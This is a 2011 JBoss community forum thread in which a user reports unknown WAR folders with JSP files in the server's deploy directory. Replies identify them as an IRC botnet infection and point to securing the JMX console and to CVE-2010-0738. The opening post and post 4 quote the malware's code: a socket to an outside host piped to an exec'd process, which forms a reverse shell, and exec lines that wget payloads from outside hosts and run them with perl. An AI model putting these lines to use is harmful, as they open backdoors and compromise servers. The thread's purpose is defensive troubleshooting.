13 Replies Latest reply on Oct 21, 2011 5:15 AM by wus81

Virus?

rkhlin Apr 6, 2011 4:20 AM

Recently I found some random war folders were created in my JBoss 4.2.3 deploy folder, like the attached snapshot.

Inside those war folders, I can find a jsp file, also with random name as well. the content is like the following: (also attached 2 samples)

...

Socket socket = new Socket("some.u.rl",443);

Process process = Runtime.getRuntime().exec("perl .ICE-unix");

(new StreamConnector(process.getInputStream(), socket.getOutputStream())).stop();

(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start();

...

Anyone knows this? Is it a virus???

If it is, I use Avast, but it can't find the virus...

Please help!

jboss.jpg 31.8 KB

1. Virus?

jaikiran Apr 5, 2011 2:46 AM (in response to rkhlin)

Richard Lin wrote:

Recently I found some random war folders were created in my JBoss 4.2.3 deploy folder, like the attached snapshot.
That's part of the deploy folder? Or is it in the tmp folder?

Have you seen this http://community.jboss.org/wiki/securejboss? If you are making the server accessible to the outside world (by using -b 0.0.0.0) then it's necessary that you make sure you are keeping it secure.
1 of 1 people found this helpful
Actions
2. Virus?

dimitris Apr 5, 2011 2:48 AM (in response to rkhlin)

I guess your jboss installation is compromised. You need to lock it up.
Actions
3. Virus?

nickarls Apr 5, 2011 2:51 AM (in response to rkhlin)

ICE-unix is a file used for xwin session info but in this case it's probably used as a backdoor for pasting in new scripts etc.

Do you have any file upload stuff in your applications that might have leaked (../../../) ?
Actions
4. Re: Virus?

rkhlin Apr 6, 2011 4:40 AM (in response to jaikiran)

In deploy foler not tmp.
I use eclipse 3.3.2.
Only deploy to localhost JBoss4.2.3.
I do have upload stuff, but never into JBoss folder.
Some jsp has this:
     Process process = Runtime.getRuntime().exec( "perl .ICE-unix" );
some has:
     Process process = Runtime.getRuntime().exec( "wget some.other.url/data/.ICE-unix" );
some has:
     Process process = Runtime.getRuntime().exec( "perl .X-un1x" );
some has:
     Process process = Runtime.getRuntime().exec( "wget even.more.urls/xel/.X-un1x" );
Actions
5. Virus?

nickarls Apr 5, 2011 3:13 AM (in response to rkhlin)

what is the content of the .ICE-unix and .X-un1x files?
Actions
6. Virus?

rkhlin Apr 5, 2011 7:48 AM (in response to nickarls)

those ip addresses are foreign to me.
Not our local ip address at all....
So I have no clue what is in it.
If I already have it into my PC, then I may already in serious trouble I think.
Actions
7. Virus?

wolfc Apr 5, 2011 1:27 PM (in response to rkhlin)

It is a virus! Do not download the link. It appears to be some IRC botnet called 'isasi-hack'.
Actions
8. Virus?

wolfc Apr 6, 2011 6:52 AM (in response to wolfc)

For security reasons I've asked the removal of all URLs linking back to the virus. Sorry for the inconvenience.
Actions
9. Re: Virus?

kdask Apr 7, 2011 10:45 PM (in response to rkhlin)

Hi, the same thing happened to me few hours ago.
I'm using jboss 4.2.3 on ubuntu linux 10.10 and suddenly i noticed some strange .war files on my deploy dir with the same files as the first poster.
Actions
10. Virus?

anil.saldhana Apr 14, 2011 9:55 AM (in response to kdask)

http://community.jboss.org/wiki/JBossBotsMalwareSecurityetc
Actions
11. Re: Virus?

wus81 Jun 15, 2011 5:33 AM (in response to rkhlin)

Hi,

I have the same problem, but has anyone an idea how they deployed this war archives?

I found nothing in the access log or in other log files?

Thanks,

Stef
Actions
12. Re: Virus?

jaime.chavarriaga Jul 22, 2011 12:55 PM (in response to wus81)

Maybe, they are using the admin-console or the jmx-console with the default user/password (admin). Using these applications, everybody can install a web application using web protocols.

If you didn't change it, you can change the information about the default user and password in some property files.

For the default server...
$JBOSS_HOME/server/default/conf/props/jmx-console-users.properties
$JBOSS_HOME/server/default/conf/props/jmx-console-roles.properties

You can get additional instructions in http://community.jboss.org/wiki/SecureJBoss
Actions
13. Re: Virus?

wus81 Oct 21, 2011 5:15 AM (in response to jaime.chavarriaga)

Thanks for your reply.

I guess this describes how the server gets infected.

http://community.jboss.org/blogs/mjc/2011/10/20/statement-regarding-security-threat-to-jboss-application-server
https://access.redhat.com/kb/docs/DOC-30741
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0738
http://www.exploit-db.com/exploits/16274/

all the best,
Actions

Go to original post